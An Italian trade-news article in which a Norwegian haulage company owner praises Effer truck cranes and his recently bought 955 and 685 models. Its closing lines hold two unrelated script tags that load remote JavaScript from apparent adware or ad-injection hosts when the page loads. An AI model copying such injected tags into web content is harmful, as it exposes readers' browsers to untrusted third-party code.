1. Home
  2. Notizie e Mercato
  3. EFFER : “Tra tanti follower un vero leader!”

EFFER : “Tra tanti follower un vero leader!”

Macchine per costruzioni di
Tommy Svanevik della Svanevik Transport & Utleie AS è nel settore del trasporto di materiale da costruzione per le grandi compagnie e ha una delle maggiori flotte di gru Effer in Europa



Quello che mi piace di Effer è che trova sempre nuove soluzioni. Io voglio essere parte attiva di questa innovazione, e offrire i vantaggi di Effer ai miei clienti. Compro Effer perché non è un follower, ma un vero leader!”. Tommy Svanevik della Svanevik Transport & Utleie AS si occupa di trasporto di materiale da costruzione per le grandi compagnie, e ha una delle maggiori flotte di gru Effer in Europa, che mostra orgogliosamente sul suo profilo Facebook:
 https://www.facebook.com/pages/Svanevik-Transport-Utleie-AS/134873853260533

La società Svanevik ha acquistato la prima gru Effer nel lontano 1973 e da allora non si è più fermata: “Il livello di personalizzazione è alto, Effer fornisce soluzioni per tutte le esigenze dalla gru piccola alla più grande e lunga. Per questa ragione utilizzo la gamma Effer, dalla 955 alla 35. La giusta soluzione per ogni cliente!”.

Da poco ha acquistato 4 gru tra 955 CroSStab 8s + 6s e 685 6s + 4s HD montate su camion Volvo dal distributore Effer in Norvegia ARKA, che nel 2012 ha festeggiato i 100 anni di storia.
Tommy continua a proposito della sua passione per Effer: “Ricordo che dopo aver visto il CroSStab non sono più riuscito a chiudere occhio finché non ho avuto l’occasione di provarlo. Una volta visto in funzione e messo alla prova ho ordinato subito le due 955! Anche il sistema Wind&Drive  è una soluzione eccezionale: si può chiudere la gru senza smontare tutto ad ogni uso. In questo modo è tutto più veloce e la vita della gru è molto più lunga perché ti consente di lavorare con pochissimi movimenti di sfilo usando principalmente il jib e la rotazione”.

Per Svanevik è fondamentale avere lo strumento più adatto per ottimizzare il lavoro di chi si rivolge alla sua società: in questo modo il costo è proporzionato al lavoro da svolgere e si può quindi chiedere un prezzo adeguato al il cliente. “Il concetto” dice Tommy “è fare il giusto lavoro al giusto prezzo, altrimenti il costo del sevizio che offro non viene ottimizzato. Con le gru Effer invece posso essere più competitivo”.

Links:
http://www.effer.com/terrestri/big/955/index.htm
http://www.effer.com/terrestri/big/685/index.htm


ARKA

https://nb-no.facebook.com/Andr.RasmussenKarosserifabrikk.AS


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>